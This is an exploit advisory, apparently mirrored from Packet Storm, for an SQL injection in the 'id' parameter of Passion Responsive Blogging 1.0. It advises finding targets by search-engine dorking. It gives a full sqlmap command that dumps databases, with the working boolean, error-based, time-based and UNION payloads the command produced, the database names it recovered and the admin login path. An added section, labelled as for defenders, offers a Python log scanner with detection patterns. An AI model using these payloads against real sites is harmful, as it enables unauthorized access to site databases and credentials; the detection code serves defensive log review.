## https://sploitus.com/exploit?id=PACKETSTORM:181409
=============================================================================================================================================
| # Title : Passion Responsive Blogging 1.0 SQL injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |
| # Vendor : https://code-projects.org/responsive-blog-site-in-php-with-source-code/ |
=============================================================================================================================================
poc :
[+] Dorking in Google or other search engine.
[+] use payload : /bmacblog/single.php?id=1 <==== inject here
[+] E:\sqlmap>python sqlmap.py -u https://www.127.0.0.1.com/bmacblog/single.php?id=1 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 9732=9732-- jEuI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 2112 FROM(SELECT COUNT(*),CONCAT(0x7176717a71,(SELECT (ELT(2112=2112,1))),0x717a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- WxeZ
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 4899 FROM (SELECT(SLEEP(5)))Buaa)-- cfil
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: id=-6131' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7176717a71,0x7067554f5a4b435a75514461626d774c4f517045565a5a6d776e6e766276754e43576176794c5974,0x717a6b7071),NULL,NULL,NULL,NULL-- -
---
[23:52:32] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[23:52:32] [INFO] fetching database names
available databases [2]:
[*] bmac_blog_admin_db
[*] information_schema
[+] Login : /blogadmin
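
For defenders reviewing their own web server logs for the requests shown above, here is an added example (not part of the original advisory): a Python scan that flags non-numeric `id` values sent to `/bmacblog/single.php` and labels them by the technique classes in the sqlmap output. The Apache combined log format, the sample lines and the documentation IP addresses are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Signatures for the four technique classes listed in the sqlmap output.
TECHNIQUES = [
    ("union", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("time-based", re.compile(r"\bsleep\s*\(", re.I)),
    ("error-based", re.compile(r"floor\s*\(\s*rand\s*\(|information_schema", re.I)),
    ("boolean-based", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),
]
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify_id(value):
    """Return None for a plain numeric id, otherwise a technique label."""
    if re.fullmatch(r"\d+", value):
        return None
    for label, pattern in TECHNIQUES:
        if pattern.search(value):
            return label
    return "non-numeric"  # anything else that is not an integer is still suspect

def scan(lines, script="/bmacblog/single.php"):
    """Return a list of (client_ip, label) for suspicious requests to the script."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if url.path != script:
            continue
        # parse_qs percent-decodes the value, so encoded payloads are matched too.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            label = classify_id(value)
            if label:
                hits.append((line.split()[0], label))
    return hits

# Constructed sample lines; payload shapes follow the output quoted on this page.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2025:00:00:01 +0000] "GET /bmacblog/single.php?id=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2025:00:00:02 +0000] "GET /bmacblog/single.php?id=1%27%20AND%209732%3D9732--%20jEuI HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2025:00:00:03 +0000] "GET /bmacblog/single.php?id=1%27%20AND%20%28SELECT%204899%20FROM%20%28SELECT%28SLEEP%285%29%29%29Buaa%29--%20cfil HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2025:00:00:04 +0000] "GET /bmacblog/single.php?id=-6131%27%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20- HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2025:00:00:05 +0000] "GET /bmacblog/single.php?id=1%27 HTTP/1.1" 500 312',
    '198.51.100.7 - - [01/Jan/2025:00:00:06 +0000] "GET /bmacblog/index.php?id=abc HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, label in scan(SAMPLE_LOG):
        print(ip, label)
```

The same integer-only rule used in `classify_id` is the input check the `id` parameter needs on the server side, alongside a parameterized query.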
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================